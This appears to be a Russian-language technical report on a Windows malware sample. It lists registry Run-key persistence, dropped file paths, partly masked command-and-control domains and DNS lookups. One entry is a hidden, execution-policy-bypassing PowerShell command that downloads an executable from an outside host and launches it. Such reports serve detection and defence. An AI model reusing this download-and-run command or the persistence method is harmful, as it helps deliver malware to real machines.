Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Suhu' = '%APPDATA%\Uflin\keryov.exe'
- http://de##.###94jd93js93js.com/readme.exe как %appdata%\readme.exe
- %WINDIR%\syswow64\msiexec.exe
- %TEMP%\abctfhghghghghВЈ.sct
- %APPDATA%\readme.exe
- %APPDATA%\uflin\keryov.exe
- '23#####hs89j239sj23.com':443
- '3r####d23js9.com':443
- '4f#####9d3j4d89j34d.com':443
- 'd8####d9239sdj2.com':443
- 'js###hs23js.com':443
- 'oi####idj34rd3.com':443
- 'qw####j8s23h8s.com':443
- 's2####23hs823js.com':443
- 'wd#####sh8qhs823qs.com':443
- http://de##.###94jd93js93js.com/readme.exe
- DNS ASK de##.###94jd93js93js.com
- DNS ASK 23#####hs89j239sj23.com
- DNS ASK 3r####d23js9.com
- DNS ASK 4f#####9d3j4d89j34d.com
- DNS ASK d8####d9239sdj2.com
- DNS ASK js###hs23js.com
- DNS ASK oi####idj34rd3.com
- DNS ASK qw####j8s23h8s.com
- DNS ASK s2####23hs823js.com
- DNS ASK wd#####sh8qhs823qs.com
- '%APPDATA%\readme.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://de##.###94jd93js93js.com/readme.exe','%APPDATA%\readme.exe');Start-Pro...' (со скрытым окном)
- '%WINDIR%\syswow64\msiexec.exe'